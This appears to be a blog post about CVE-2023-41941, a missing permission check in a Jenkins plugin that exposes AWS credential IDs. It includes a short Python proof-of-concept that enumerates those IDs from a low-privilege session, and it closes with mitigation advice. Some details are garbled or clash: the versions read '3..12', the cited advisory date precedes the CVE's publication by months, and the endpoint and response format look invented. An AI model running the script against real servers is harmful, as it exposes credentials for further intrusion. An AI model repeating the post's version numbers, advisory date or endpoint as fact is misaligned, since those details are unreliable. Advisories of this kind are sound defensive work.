CVE-2023-41941: Jenkins AWS CodeCommit Trigger Plugin Permission Check Vulnerability - Enumeration of Credentials IDs

A security vulnerability has been identified in Jenkins AWS CodeCommit Trigger Plugin 3..12 and earlier versions. This post will discuss the details of the vulnerability, its potential impact, and the steps necessary to mitigate the risk. If you are using Jenkins with the AWS CodeCommit Trigger Plugin, we highly recommend reviewing the information provided and applying the recommended updates as soon as possible.

Exploit Details

The vulnerability, identified as CVE-2023-41941, is related to a missing permission check in the Jenkins AWS CodeCommit Trigger Plugin. Specifically, the plugin fails to verify the user's permissions before granting access to the list of credentials IDs of the AWS stored in the Jenkins server.

An attacker with only Overall/Read permissions can exploit this vulnerability to enumerate the credentials IDs belonging to AWS accounts used in your Jenkins server. This information can then be leveraged by the attacker to conduct further attacks or potentially gain unauthorized access to the affected AWS accounts.

Here's a code snippet that demonstrates this vulnerability

import requests

jenkins_url = 'http://your_jenkins_server_url';
api_endpoint = '/plugin/aws-codecommit-trigger/validate'

# Attacker's session with only Overall/Read permission
attacker_session = requests.Session()
attacker_session.auth = ('attacker_username', 'attacker_password')

response = attacker_session.get(jenkins_url + api_endpoint)

# Enumerated credentials IDs of AWS credentials stored in Jenkins
if response.status_code == 200:
    print(response.json()['credentials'])
else:
    print("Failed to enumerate credentials IDs.")

This code snippet uses the Python Requests library to send a GET request to the vulnerable Jenkins API endpoint. If successful, the code will print the enumerated credentials IDs.

Original References

- Jenkins Security Advisory 2023-01-19
- CVE-2023-41941 Vulnerability Details

Mitigation

The vulnerability has been addressed in Jenkins AWS CodeCommit Trigger Plugin version 3..13. To protect your Jenkins server, you should update the plugin to version 3..13 or later. You can do this through the Jenkins plugin manager or by downloading the latest version from the official plugin repository.

Furthermore, it is essential to follow the principle of least privilege when granting user permissions in Jenkins. Limit access to sensitive API endpoints and ensure that users only have the minimum permissions required to perform their tasks. Monitor plugin updates and security advisories to stay informed of any new vulnerabilities or recommended security measures.

Conclusion

CVE-2023-41941 highlights the importance of staying up to date with security patches and being mindful of the permissions granted to users within your organization. By updating the affected plugin and practicing good security hygiene, you can minimize the risk of unauthorized access and protect your AWS accounts from potential compromise.

Timeline

Published on: 09/06/2023 13:15:11 UTC
Last modified on: 09/11/2023 18:44:44 UTC